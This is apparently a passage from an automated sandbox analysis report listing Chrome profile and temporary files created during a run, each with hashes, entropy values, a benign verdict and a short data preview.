                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):451603
                                                                                                                                                                                                                        Entropy (8bit):5.009711072558331
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
                                                                                                                                                                                                                        MD5:A78AD14E77147E7DE3647E61964C0335
                                                                                                                                                                                                                        SHA1:CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
                                                                                                                                                                                                                        SHA-256:0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
                                                                                                                                                                                                                        SHA-512:DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                                        Preview: BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\0a8577d8-4c45-4993-9311-a8f991b6ac23.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189511
                                                                                                                                                                                                                        Entropy (8bit):6.045222825600431
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:DAC43F6C68D10D4B09DFF418FCB32275
                                                                                                                                                                                                                        SHA1:FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
                                                                                                                                                                                                                        SHA-256:6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
                                                                                                                                                                                                                        SHA-512:9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\0da807b5-fddb-4ece-8b19-3e1667cffc25.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189605
                                                                                                                                                                                                                        Entropy (8bit):6.045488285632766
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:q8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:rjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:3FFD73F9E5718D722FF2012F1CD49DCF
                                                                                                                                                                                                                        SHA1:E23AFF0EFFDEE0DB365B5D2DB5B99B1C8835461E
                                                                                                                                                                                                                        SHA-256:7C8D9EDF38CE3AD6DB57FC16D62E41686CC9BC32729D689D2C36C8C4C3FC67B1
                                                                                                                                                                                                                        SHA-512:61543123BD8DF7B63552384EB9B45769867FA4107D0821D80CF2479407B97205C5A8E5DFF398B0D29E65721B9DE45F963A89361DF15421022C09ADC132175CFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\2a6dfe04-c976-4ba3-88f6-7fe64ac2d1ae.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SysEx File -
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):94708
                                                                                                                                                                                                                        Entropy (8bit):3.7427683621330914
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:l9JQfn9CcpWdBVOUD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my1iNzTTcOxZ7F:7xGa11yZ0csezvRJYnH+VKPdT5D
                                                                                                                                                                                                                        MD5:A95E66E95D905D36656EBB64AE3D0C0E
                                                                                                                                                                                                                        SHA1:EDB90ABA546D0B49AF5D04D0D324760A6DF9862A
                                                                                                                                                                                                                        SHA-256:F8E19D6896EAECFD04F4593E4E3B56821F2A7F4F80BD53C0D880A9670E55A826
                                                                                                                                                                                                                        SHA-512:CAB90882A03A4317C0A400EC815FC5D23DD8D2C74BC5CCA1BF3185445683E3FB907138CFC0FE3C24237C9AA25BBAF3344D2E313AB4A22520810811EB441DF1E7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\45351cc9-0dfd-46b2-a2a4-528473db92b5.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189605
                                                                                                                                                                                                                        Entropy (8bit):6.045488285632766
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:q8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:rjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:3FFD73F9E5718D722FF2012F1CD49DCF
                                                                                                                                                                                                                        SHA1:E23AFF0EFFDEE0DB365B5D2DB5B99B1C8835461E
                                                                                                                                                                                                                        SHA-256:7C8D9EDF38CE3AD6DB57FC16D62E41686CC9BC32729D689D2C36C8C4C3FC67B1
                                                                                                                                                                                                                        SHA-512:61543123BD8DF7B63552384EB9B45769867FA4107D0821D80CF2479407B97205C5A8E5DFF398B0D29E65721B9DE45F963A89361DF15421022C09ADC132175CFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\6bbaea5c-07b7-4ad3-bdce-04c536bc21ca.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):92724
                                                                                                                                                                                                                        Entropy (8bit):3.7422964082867938
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:r9JQfn9CcldCD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my1iNzTTcOxZ7NG1Lf:h2a11yZ0csezvRJYnH+VKPdT5g
                                                                                                                                                                                                                        MD5:715C48E8348BDDFECE7F32926382776E
                                                                                                                                                                                                                        SHA1:7D0FA2158079758D638723A92D23F91E057213FB
                                                                                                                                                                                                                        SHA-256:038D7850A7D72454118D904BAB38D0A28C3CDE061FD64893A37CFBF47BBC9F45
                                                                                                                                                                                                                        SHA-512:9B0A7CEF983DCE3006D3B8B8A917D0183BC064660F87B162A7ECFB57EB91CEE66AC8397E0FEF8CCB024838B8990C6D3A64F1BDAE8EB8C39FECC8B4D483DFD280
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 0j..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\7753f474-3514-4b35-810b-c1c59452ed93.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):197987
                                                                                                                                                                                                                        Entropy (8bit):6.074203563171146
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:n2jwkXLsJeQBhCepsPmtaqfIlUOoSiuRG:n2dXQJeECaChox
                                                                                                                                                                                                                        MD5:4C67953A65483EA41F5973B997DE7DF0
                                                                                                                                                                                                                        SHA1:78DE59DB7A213A13140C2EFB8959D6AE2FDB9BEC
                                                                                                                                                                                                                        SHA-256:D3CD3998C09B37F6AF738967EF55261D587B4B467369EA546BE40B6CC557B5A4
                                                                                                                                                                                                                        SHA-512:E826AE2BC7067C5987D7403459F338D3937008B9EAB78B8A64C08B03E2D0CEB695C1D8CDCD14341DB3E77AB73FAE662097CEE79F0AC65339E003ACDCD127A2BA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\813ade3c-521f-4dab-b809-8e4cbbc517d6.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):189511
                                                                                                                                                                                                                        Entropy (8bit):6.045222825600431
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
                                                                                                                                                                                                                        MD5:DAC43F6C68D10D4B09DFF418FCB32275
                                                                                                                                                                                                                        SHA1:FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
                                                                                                                                                                                                                        SHA-256:6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
                                                                                                                                                                                                                        SHA-512:9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\9821f99d-7388-4508-b536-588faf6965ff.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):197987
                                                                                                                                                                                                                        Entropy (8bit):6.074203398417346
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:8mjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG:8mdXQJeECaChox
                                                                                                                                                                                                                        MD5:6512D2F26E38DB5F659DE90FFA439FA5
                                                                                                                                                                                                                        SHA1:30655ECFB3649684B46E4D809CBA175768C0A4D1
                                                                                                                                                                                                                        SHA-256:1C69AA180BBD4AEB5E50D36B440C31D8B4A5B80815D99C3A95F1F548EF207A92
                                                                                                                                                                                                                        SHA-512:CA7B3EF6DBB9D48658E67AD82243851B3D3874650E355511A106A00817E164C2E59E93D8C428184C8069D6F91D0B46D2F1D06B5F08A037202EE79365E7C02C02
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                        Entropy (8bit):3.254162526001658
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:FkXft0xE1n:+ftIE1n
                                                                                                                                                                                                                        MD5:BD4642AD6C750A12D912B20BCB92E14D
                                                                                                                                                                                                                        SHA1:C549F0F48FDD4FBC62E51AC26D7E185160CE2123
                                                                                                                                                                                                                        SHA-256:4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
                                                                                                                                                                                                                        SHA-512:04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: sdPC....................s}.....M..2.!..%
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\28a1e05d-9c75-4640-a463-18106351aa14.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15600
                                                                                                                                                                                                                        Entropy (8bit):5.602933196240875
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItyLlVjXi1kXqKf/pUZNCgVLH2HfD8rUR6hO4xQ:yLl9i1kXqKf/pUZNCgVLH2HfgrURIOyQ
                                                                                                                                                                                                                        MD5:20F77A003432CD1667516DAF0DECB69F
                                                                                                                                                                                                                        SHA1:6102EFB30CAF7435097937D336B7867F4D90DFA5
                                                                                                                                                                                                                        SHA-256:688A96E21C7964E664F3079BD69EE9AFC91A23894B3A6910CC81D31E6F95B424
                                                                                                                                                                                                                        SHA-512:86CA69837236A1107CFEF84A7585761D8BC4D80AF4319AAB7566BEB47A665DF40D80C575ED86F88AA5810BD9DCC29A625A89677B10D174B062530CFB0CF09374
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):334
                                                                                                                                                                                                                        Entropy (8bit):5.223979564263548
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxxU1lL+q2PWXp+N23iKKdK9RXXTZIFUtAPdxLWz1Zmw2PdxF0LVkwOWXp+Ns:uPC1Iva5Kk7XT2FUtAP7Wz1/2Pa5f5KU
                                                                                                                                                                                                                        MD5:D9423C825B7DCE6B7E69E073A372EE3E
                                                                                                                                                                                                                        SHA1:22FAB73F855C788BF792AC4D8E55CD139D4528C5
                                                                                                                                                                                                                        SHA-256:9BCCA9816E11493121B85760C1B495178C7B6A673DF244DAC91EF9FB37379180
                                                                                                                                                                                                                        SHA-512:86F06B45DA916AFBA1D9FB6E683D700E13E17B3C8E5FC6D793F24D2CAAB4D0298EA12B28D20680F699DAEA259B0505E8DF3826F7081A6AB11BBB46C15F99226B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.060 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/12/06-19:08:55.062 15e8 Recovering log #3.2021/12/06-19:08:55.071 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):334
                                                                                                                                                                                                                        Entropy (8bit):5.223979564263548
                                                                                                                                                                                                                        Encrypted:false
